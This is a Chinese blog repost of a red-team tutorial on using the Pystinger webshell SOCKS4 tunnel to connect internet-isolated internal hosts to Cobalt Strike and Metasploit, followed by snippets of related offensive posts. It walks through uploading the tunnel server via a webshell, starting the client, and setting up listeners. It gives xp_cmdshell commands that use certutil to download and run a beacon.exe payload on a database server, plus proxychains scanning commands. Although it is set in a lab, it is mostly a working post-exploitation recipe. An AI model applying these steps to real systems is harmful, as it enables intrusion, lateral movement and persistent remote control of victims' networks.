(毒刺)利用Pystinger Socks4上线不出网主机

已于 2022-08-11 14:50:08 修改
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 内网 文章标签: java servlet 服务器
于 2022-07-01 20:24:15 首次发布
原文链接:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw
版权

(毒刺)利用Pystinger Socks4上线不出网主机

原文链接:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw
可参考:http://caidaome.com/?post=279

我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出网主机的姿势,包括单主机和内网多台主机的两种常见场景!!!

项目地址:https://github.com/FunnyWolf/pystinger

**相关阅读:

**

1、利用MSF上线断网主机的思路分享

2、利用goproxy http上线不出网主机

0x01 测试环境

攻击机(Kali):192.168.56.101受害机1(Web):192.168.56.102、192.168.186.3 - 双网卡受害机2(Data):192.168.186.4 - 断网机

0x02 Pystinger简单介绍

Pystinger由服务端webshellstinger_server和客户端stinger_client两部分组成,可通过webshell实现内网SOCK4代理及端口映射,支持php/jsp(x)/aspx三种代理脚本。

图片

webshell只负责流量转发,大部分建立连接及处理数据的工作由stinger_server完成,stinger_client则用于接收转发过来的流量数据以及与CS/MSF的listener建立TCP连接等。

大致原理如下图,更为详细的原理分析可阅读“奇安信安全服务”公众号中的“红队攻防实践:不出网主机搭建内网隧道新思路”一文进行学习了解。

图片

0x03 Pystinger上线不出网主机

我们先将Pystinger项目的服务端stinger_server.exe、proxy.aspx通过中国菜刀上传至目标磁盘可读写目录中,访问proxy.aspx返回UTF-8表示正常,接着执行以下命令启动服务端。

start C:\inetpub\wwwroot\stinger_server.exe 0.0.0.0

图片

**注:**作者提示不要直接运行D:/XXX/stinger_server.exe,因为这样可能会导致TCP断连。

将客户端stinger_client上传至Kali攻击机的tmp临时目录,然后再执行以下命令将Socks4的代理流量转发到我们Kali攻击机60000端口上,只要把-w参数替换为自己上传的代理脚本地址即可。

root@kali:/tmp# chmod 777 stinger_clientroot@kali:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000

图片

场景1:单主机上线

已控主机为单主机,不出外网且仅允许访问目标Web的80端口。如遇这种场景时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填127.0.0.1,HTTP Port填60020

图片

场景2:多主机上线

已控主机为内网其中一台主机,双网卡(192.168.56.X为出网段,192.168.186.X为不出网段),在对不出网段中的其他内网主机进行横向移动上线时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填192.168.186.3,HTTP Port填60020

图片

配置好监听后生成一个可执行马儿,将该文件放至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载,再利用xp_cmdshell组件执行beacon.exe后即可成功上线,Pystinger客户端那边也收到了相关连接数据。

EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:\ProgramData\beacon.exe'EXEC master..xp_cmdshell 'C:\ProgramData\beacon.exe'

图片

图片

CobaltStrike监听设置

  • 单主机上线:CobaltStrike->Listeners->Add->127.0.0.1:60020

  • 多主机上线:CobaltStrike->Listeners->Add->192.168.186.3:60020

  • **注:**目标主机为双网卡时必须用不出网IP段的内网IP地址进行监听才能上线不出网主机;

上线至MSF的利用姿势

Kali攻击机上编辑/etc/proxychains.conf文件,底部添加一条socks4代理:127.0.0.1:60000,添加完成后先执行以下几条命令来验证下是否已经与不出网IP段通了?

root@kali:~# proxychains telnet 192.168.186.4 1433root@kali:~# proxychains curl http://192.168.186.4root@kali:~# proxychains nmap -sT -Pn 192.168.186.4[...SNIP...]

如果通了就再用proxychains来启动msfconsole,用不出网IP段的内网IP地址进行监听即可。原理大家都懂,就不实操截图了…。

root@kali:~# proxychains msfconsole -q[...SNIP...]
明月清风~~
关注
专栏目录
53-5 内代理7 - CS上线不出主机
weixin_43263566的博客
07-10 184
这里就用之前内代理的靶场,把web服务器这台虚拟机关闭掉,用剩下的3台加kali。内代理7、CS上线不出主机
socks4a:一个使用golang实现socks4a服务器的例子
07-08
它扩展了原始的SOCKS4协议,增加了对非标准DNS解析的支持,允许客户端通过服务器连接到任意的IP地址,包括那些不在服务器本地DNS解析范围内的地址。这使得SOCKS4a在代理服务器应用中更加灵活,可以用于绕过某些络...
Pystinger上线不出机器
crowsec
10-20 486
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01 使用场景 毒刺Pystinger)通过webshell搭建内socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不出但存在web应用可被互联访问的情况。 02拓扑结构 03使用方法 下载地址: https://github.com/FunnyWolf/pystinger 拿下第一层络后,上传webshell到机器上。 访问 http://靶...
渗透中目标不出情况下使用pystinger进行上线Cobalt Strike
qq_43776040的博客
02-17 3319
渗透中目标不出情况下使用pystinger进行上线cobaltstrike简介上传服务端与代理文件 简介 By:猪儿虫 Github:https://github.com/black537 在内渗透中我们常常遇到内不出情况。今天推荐一款工具pystinger。这款工具是一个使用webshell进行流量转发出的工具。它使用的是sock4代理,端口映射。可直接进行上线metasploit-framework、viper、cobalt strike。目前只支持PHP、jsp(x)、aspx三种
安全:Socks 代理 -- 本地代理 技术._socks代理
heike_Ch的博客
08-22 863
从时代发展的角度看,络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
pystinger (毒刺)正向代理工具
weixin_66717977的博客
03-21 1908
pystinger毒刺是一款正向代理工具,通过webshell可以实现内 socks4代理和端口映射,并且也可以直接上线MSF和CS。
【工具使用】Pystinger(毒刺)的使用
做自己喜欢的事,并将其发挥到极致!
03-09 1476
文章目录Pystinger介绍项目地址Pystinger 原理图实现主机上线CS服务端配置客户端配置 Pystinger介绍 一款用于Webshell实现内 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。 项目地址 https://github.com/FunnyWolf/pystinger https://gitee.com/zhanghk66
pystinger实现不出情况下,上线CS的方式
szgyunyun的博客
04-25 417
获取到webshell,目标服务器不出。目标机:内地址,端口映射到公ip。s生成后门在目标机运行。
代理服务器批理检测工具,支持socks5,socks4,http和https代理批理检测是否可用
最新发布
09-15
支持http https socks4及socks5代理的批量检测。 支持所有windows版本运行! 导入方式支持手工选择文件及拖放文件。 导入格式支持三种格式: 第一种:用|号分割 2409:8a50:8019:e470:a8d7:bdf0:fbfe:8b5d|1080|...
rpc2socks:漏洞利用后工具可通过Windows主机使用命名管道通过SMB上的可扩展自定义RPC协议通过Windows主机启用SOCKS隧道
03-20
rpc2socks是一个客户端-服务器解决方案,允许从Unix或Windows主机在Windows目标上删除并远程运行自定义RPC + SOCKS-SMB的自定义服务器应用程序。 客户端/服务器对可以用作常规的SOCKS5隧道(请参见下面的专用部分)...
Cobal_Strike踩坑记录-DNS Beacon1
08-03
Cobal_Strike踩坑记录-DNS Beacon1
Webshell不出方案之正向socks代理reGeorg+Proxifier使用
Websec
09-14 8831
1、首先你已经拥有了一个webshell,如下我拥有一个天蝎shell: 2、机器不出(无法ping百度)。 2、这个时候需要使用reGeorg将我们的流量正向代理出来。 reGeorg地址如下: https://github.com/sensepost/reGeorg 下载到本地。 具体详细操作使用为: 第一步:上传tunnel.(aspx/php/jsp/ashx)到你控制的服务器上(如何拥有一台已控取决于自己)。 第二步:上传成功后核对你的tunnel脚本成功使用,一般正
记一次Shiro实战(目标不出
m0_49936858的博客
08-13 1329
获取Webshell 可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取。直接在工具中选择获取webshell,然后填入想写入的路径+webshell的名字,比如https://xxxxx/fxqgl/static/flash/ini.jsp ,ini.jsp是我自己命名的。1.在工具的哪个地方上传木马。3. 找上传木马的地方。...
去面HVV蓝队面试了
分享Python知识
07-14 446
去面HVV蓝队面试了
HW相关面试题目汇总
Gdxdingjian666的博客
05-19 1158
文章来自:道一安全,零漏安全,青峰安全等公众号以及github上的一些姿势汇总,可能会有重复但还是建议都看看
站被挂马植入webshell导致站瘫痪案例
tigerman20201的博客
01-25 897
一、问题现象 下午两点,刚刚睡醒,就接到了客户打来的电话,说他们的站挂(这个用词很不准确,但是感觉到问题的严重性)了,询问是怎么发生的,之前做了什么操作,客户的回答是:什么都没做,突然就不行了!对于这样的回答,我早已习惯,因为要想从客户那里得到有用的咨询,基本上很难,因为客户不是专业人士,所以只能根据客户的描述,一步步去判断问题。 通过客户给出的这个提示,问题判断方向有如下几个方面: 1、站无法访问了,可能服务down了。也可能服务器宕机了。 2、站访问很慢,基本打不开,所以客户就认为宕机了,
拿到webshell后虚拟终端拒绝访问
sudo0m的博客
08-20 2231
#0x00 拿到Webshell后输入命令都是拒绝访问,不管你输了什么都是拒绝访问就像这样: 这是因为没有设置终端,现在设置一下终端 cmd下载地址: https://sudo0m.coding.me/update/webshell/cmd.exe #0x01 可以输命令,但是还是拒绝访问,权限不够iis6.0可以进行溢出,(我是个小白所以,,) iis6.0才可进行以下操作,...
socks4a内扫描主机端口
10-27
Socks4a 是一种 SOCKS 协议的变种,它允许用户通过代理服务器访问内部络的主机和服务。在使用 Socks4a 进行内扫描主机端口时,我们可以按照以下步骤进行: 1. 首先,需要准备一台可以访问代理服务器主机,这台主机可以是位于内或者外部络的机器。我们需要在该主机上配置好 Socks4a 代理,以便让我们可以使用此代理进行连接。 2. 接下来,我们需要选择一个可以进行扫描的目标主机或一组主机。通常,我们需要明确知道要扫描的主机的 IP 地址。 3. 通过配置代理服务器的设置,我们需要将扫描工具的流量路由到 Socks4a 代理服务器。这可以通过设置扫描工具或操作系统的络代理设置来实现。 4. 然后,使用端口扫描工具,例如 Nmap 工具,指定目标主机的 IP 地址和要扫描的端口范围。在 Nmap 命令中,可以通过添加 `-Pn` 参数来禁用主机的 Ping 操作,因为在内环境中有可能无法 Ping 通目标主机。 5. 在扫描过程中,工具将通过配置的 Socks4a 代理服务器向目标主机发送扫描请求。如果代理服务器已正确配置,并且目标主机处于局域中并可访问,那么扫描工具将能够获取目标主机的开放端口信息。 需要注意的是,在使用 Socks4a 进行内扫描主机端口时,必须具备合法的权限才能对内部络进行扫描。同时,为了维护络安全,应严格遵守相关规定,并获得所在络环境的授权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值